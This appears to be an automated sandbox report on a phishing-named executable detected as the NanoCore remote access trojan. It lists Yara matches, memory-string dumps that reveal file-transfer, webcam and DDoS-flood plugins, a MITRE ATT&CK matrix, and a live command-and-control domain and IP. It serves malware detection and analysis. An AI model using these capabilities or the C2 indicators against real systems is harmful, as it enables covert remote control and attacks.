Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: dhcpmon.exe, 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Scheduled Task/Job1	Process Injection111	Masquerading2	Input Capture21	Query Registry1	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion3	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information31	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
COMPANY PROFILE AND DOCUMENTED OFFER.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
14.2.dhcpmon.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnM	0%	Avira URL Cloud	safe
hailongfvt.zapto.org	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.founder.com.cn/cnG	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fonts.comic	0%	URL Reputation	safe
http://www.fontbureau.comoH	0%	Avira URL Cloud	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.monotype.	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.founder.com.cn/cnr	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hailongfvt.zapto.org	185.140.53.139	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
hailongfvt.zapto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnM	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.tiro.com	dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnG	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
